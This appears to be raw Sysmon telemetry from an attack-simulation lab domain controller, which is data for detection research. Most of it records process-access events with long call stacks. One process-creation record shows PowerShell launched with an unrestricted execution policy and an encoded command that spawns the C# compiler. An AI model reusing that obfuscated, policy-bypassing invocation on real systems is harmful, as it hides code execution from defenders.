C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000146Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:16.325{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000145Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:16.325{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000144Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:16.325{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000143Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:16.325{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000142Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:16.325{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000141Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:16.325{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000140Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:16.325{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000139Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:16.325{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000138Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:16.325{59A5CD1D-8C95-6005-0500-00000000A201}6401196C:\Windows\system32\csrss.exe{59A5CD1D-8E1C-6005-C002-00000000A201}5108C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000137Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:16.325{59A5CD1D-8E1A-6005-BE02-00000000A201}22644088C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{59A5CD1D-8E1C-6005-C002-00000000A201}5108C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+270222|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26fe9f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26f9ee|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26f97a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26e48b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+7c1edb|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+7c19a9|UNKNOWN(00007FFA402CB68F) 154100x8000000000000000136Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:16.297{59A5CD1D-8E1C-6005-C002-00000000A201}5108C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.7.2053.0 built by: NET47REL1Visual C# Command Line CompilerMicrosoft® .NET 
FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\4lax1uev.cmdline"C:\Users\Administrator\ATTACKRANGE\Administrator{59A5CD1D-8E18-6005-43DF-0F0000000000}0xfdf430HighMD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52{59A5CD1D-8E1A-6005-BE02-00000000A201}2264C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 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 11241100x8000000000000000135Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:16.294{59A5CD1D-8E1A-6005-BE02-00000000A201}2264C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\4lax1uev.cmdline2021-01-18 13:33:16.294 11241100x8000000000000000134Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:33:16.294{59A5CD1D-8E1A-6005-BE02-00000000A201}2264C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\4lax1uev.dll2021-01-18 13:33:16.294 10341000x8000000000000000133Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:16.059{59A5CD1D-8CA6-6005-0B00-00000000A201}876600C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000132Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:16.059{59A5CD1D-8CA6-6005-0B00-00000000A201}876600C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000131Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:16.059{59A5CD1D-8CA6-6005-0B00-00000000A201}876600C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
22542200x8000000000000000260Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:16.783{59A5CD1D-8E15-6005-B802-00000000A201}45601.0.0.127.in-addr.arpa.0type: 12 win-dc-495.attackrange.local;C:\Windows\sysmon64.exe 22542200x8000000000000000259Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:16.783{59A5CD1D-8E15-6005-B802-00000000A201}45601.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.ip6.arpa.0type: 12 win-dc-495.attackrange.local;C:\Windows\sysmon64.exe 10341000x8000000000000000258Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.794{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000257Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:17.794{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000256Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.794{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x8000000000000000255Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.747{59A5CD1D-8E1D-6005-C302-00000000A201}48324960C:\Windows\system32\conhost.exe{59A5CD1D-8E1D-6005-C702-00000000A201}5024C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000254Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.747{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000253Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:17.747{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000252Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.747{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000251Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:17.747{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000250Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.747{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000249Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
